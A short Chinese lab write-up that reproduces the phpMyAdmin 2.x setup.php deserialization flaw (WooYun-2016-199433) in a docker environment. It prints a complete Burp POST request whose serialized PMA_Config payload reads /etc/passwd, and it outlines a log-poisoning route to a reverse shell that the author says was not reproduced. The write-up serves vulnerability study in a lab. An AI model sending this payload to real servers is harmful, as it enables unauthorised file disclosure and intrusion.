phpMyadmin是一套开源的、基于Web的Mysql数据库管理工具。这个实验利用php的反序列化实现了任意文件读取,影响的版本是phpMyAdmin 2.x,然鹅,令人激动的是网上有师傅分享了利用该漏洞实现了反弹shell,思路是先访问出错,让access.log或者error.log记录出错信息,然后在利用反序列化读取access.log或者error.log文件中的代码,实现反弹shell,心动不如行动~
ailx10
网络安全精良回答者
网络安全硕士
去咨询
条件:准备好docker环境,下载好书本配套实验环境,进入目录 ,开始复现漏洞
docker-compose build //可选docker-compose up -d完成试验后,记得删除漏洞环境哦~~
docker-compose downdocker system prune -a -f //可选大略访问一下,解释phpMyAdmin scripts:setup.php 反序列化漏洞(WooYun-2016-199433)环境搭建成功了
取出burpsuite准备发一个POST要求,获取etc目录下的passwd文件内容
POST /scripts/setup.php HTTP/1.1Host: 144.34.162.13:8080Accept-Encoding: gzip, deflateAccept: /Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 80action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
由于这个实验中,无法记录要求,因此,就没有连续复现反弹shell了